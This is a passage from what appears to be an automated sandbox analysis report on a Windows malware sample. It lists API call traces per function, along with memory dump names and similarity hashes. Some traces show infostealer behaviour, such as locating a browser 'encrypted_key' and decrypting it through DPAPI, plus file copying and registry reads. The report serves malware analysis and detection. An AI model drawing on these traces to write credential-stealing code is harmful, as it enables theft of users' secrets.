CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
LocalFree.KERNEL32(00410127), ref: 00409AE0
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: 05ed42e63fd74b815e84f1989cd72ce9f9ee0e1b6034f55d12926f8b286bbe54
Instruction ID: 9a616c59c25f48dda5b41b64f2eda75996ce8e2783f016847e561ac14b63f668
Opcode Fuzzy Hash: 05ed42e63fd74b815e84f1989cd72ce9f9ee0e1b6034f55d12926f8b286bbe54
Instruction Fuzzy Hash: 5D310AB4A00209EFDB24CF95C895BAE7BB5BF48314F108169E911A73D0D778AD41CFA5

Function 00414260 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,026D9100), ref: 004142BB

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 004142E1
lstrcat.KERNEL32(?,?), ref: 00414300
lstrcat.KERNEL32(?,?), ref: 00414314
lstrcat.KERNEL32(?,026B94D8), ref: 00414327
lstrcat.KERNEL32(?,?), ref: 0041433B
lstrcat.KERNEL32(?,026D9860), ref: 0041434F

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418830: GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F

Part of subcall function 00414050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414060
Part of subcall function 00414050: HeapAlloc.KERNEL32(00000000), ref: 00414067
Part of subcall function 00414050: wsprintfA.USER32 ref: 00414086
Part of subcall function 00414050: FindFirstFileA.KERNEL32(?,?), ref: 0041409D

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: dcb64fc2a139841cd2b9e474ea0c64847747aa9f2a659b48b44303e3aaff7578
Instruction ID: 4fb66fc9f0e99d4a69d4435a00fe4e0f35192ff1271240cc59f29c1c24f4a50f
Opcode Fuzzy Hash: dcb64fc2a139841cd2b9e474ea0c64847747aa9f2a659b48b44303e3aaff7578
Instruction Fuzzy Hash: 663188B290021CA7CB24FBA0DC85EDD773DAB58708F40459EB60596091EE7897C9CFA8

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

Function 00409D30 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D89

Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
Part of subcall function 00409B10: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
Part of subcall function 00409B10: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F

memcmp.MSVCRT ref: 00409DE2

Part of subcall function 00409BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
Part of subcall function 00409BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
Part of subcall function 00409BB0: memcpy.MSVCRT ref: 00409C16
Part of subcall function 00409BB0: LocalFree.KERNEL32(?), ref: 00409C23

Strings

DPAPI, xrefs: 00409DD9
"encrypted_key":", xrefs: 00409D80
, xrefs: 00409E11

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 596995583-738592651
Opcode ID: 1b3b2d2c445c70206a6622af5ace0cc58a721cd3e0b5ddc67bd7cf7d43f6fa64
Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
Opcode Fuzzy Hash: 1b3b2d2c445c70206a6622af5ace0cc58a721cd3e0b5ddc67bd7cf7d43f6fa64
Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5

Function 6C6EC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C6EC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C6EC969
GetSystemInfo.KERNEL32(?), ref: 6C6EC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C6EC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C6EC9E2

Memory Dump Source

Source File: 00000000.00000002.2441563496.000000006C6D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6D0000, based on PE: true

Associated: 00000000.00000002.2441528205.000000006C6D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441654899.000000006C75E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6d0000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: efdc8ac4c9116c58d899ebe4d7ce15631de410d3bb65a579469957571bf6e645
Instruction ID: 7cefc1e5911ba844cff9735c1030e51971bde6144d6a81a7d10d4584807537ca
Opcode Fuzzy Hash: efdc8ac4c9116c58d899ebe4d7ce15631de410d3bb65a579469957571bf6e645
Instruction Fuzzy Hash: 5E210A717062047BDB04AB24DC88BAE77B9AB4A304F90012AF903A7780EF20680487A5

Function 004178A0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
HeapAlloc.KERNEL32(00000000), ref: 004178DE
RegOpenKeyExA.KERNEL32(80000002,026B9950,00000000,00020119,?), ref: 004178FE
RegQueryValueExA.KERNEL32(?,026D99A0,00000000,00000000,000000FF,000000FF), ref: 0041791F
RegCloseKey.ADVAPI32(?), ref: 00417932

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction ID: 7b98265181db112957e654b40feb51e707849e62a0e01f8308d40af4a82c50e7
Opcode Fuzzy Hash: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction Fuzzy Hash: EB11C1B1A04605AFDB10CF84DD4AFBFBB79FB48B10F10411AF605A7280D7785805CBA5

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction ID: 190bc7a1a7c8d7045dc387aced5cbf31aaec2b72b8248f43f4a0638ea244b090
Opcode Fuzzy Hash: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction Fuzzy Hash: 34013179A40208BFDB10DFE0DC49FAEB779FF48710F108158FA05A7290D6709A05CB50

Function 00410580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,026BBF78), ref: 004105DA
StrCmpCA.SHLWAPI(00000000,026BBFE8), ref: 004106A6
StrCmpCA.SHLWAPI(00000000,026BBFD8), ref: 004107DD

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

@ZA, xrefs: 00410880, 00410894, 00410643, 0041075B, 00410646, 0041075E, 00410883

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy
String ID: @ZA
API String ID: 3722407311-3461648394
Opcode ID: 69352e209d5812064e25e52200a6d38fd8400d23bb14a02a5bca3199dddf2c70
Instruction ID: dd73e37cf26ee0a5b727ab7f8fa236140303cf2c4538d3aa2ff7e25b79bad790
Opcode Fuzzy Hash: 69352e209d5812064e25e52200a6d38fd8400d23bb14a02a5bca3199dddf2c70
Instruction Fuzzy Hash: E6917775B002089FCB28EF65D995FED7775BF94304F00812EE8099F291DB349A59CB86

Function 004105A5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,026BBF78), ref: 004105DA
StrCmpCA.SHLWAPI(00000000,026BBFE8), ref: 004106A6
StrCmpCA.SHLWAPI(00000000,026BBFD8), ref: 004107DD

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

@ZA, xrefs: 00410643, 0041075B, 00410646, 0041075E

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy
String ID: @ZA
API String ID: 3722407311-3461648394
Opcode ID: 8b84c339ba222624b1e16b09e7cb2310438a158e5e72a36378d9a32d2965c5a1
Instruction ID: 4e5c4e7109811dd04489307e57989d734427ebddea2fc0f69e8a4a25ed86313c
Opcode Fuzzy Hash: 8b84c339ba222624b1e16b09e7cb2310438a158e5e72a36378d9a32d2965c5a1
Instruction Fuzzy Hash: 82819775B002089FCB28EF65D995EEDB7B5FF94304F10812DE8099F251DB34AA45CB86

Function 00409FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(026BBE08,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040FF93), ref: 0040A00D
LoadLibraryA.KERNEL32(026D97A0,?,?,?,?,?,?,?,?,?,?,?,0040FF93), ref: 0040A096

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,026B6470,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

SetEnvironmentVariableA.KERNEL32(026BBE08,00000000,00000000,?,00421290,?,0040FF93,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00420AE6), ref: 0040A082

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040A002, 0040A016, 0040A02C

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 6ec311af20ecbc816ffd9855d14174dc10ba37699007246f40a5febf5340d868
Instruction ID: 756634b6078292b8205bba75648758324288abb3cd7bb3e0efd9893355994f5a
Opcode Fuzzy Hash: 6ec311af20ecbc816ffd9855d14174dc10ba37699007246f40a5febf5340d868
Instruction Fuzzy Hash: 8D41E471804604AFC724EFB4EC56BAE3776BF48324F15512EF405A32A0D7B85986CB97

Function 0040A1B0 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,026B8CB8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A231
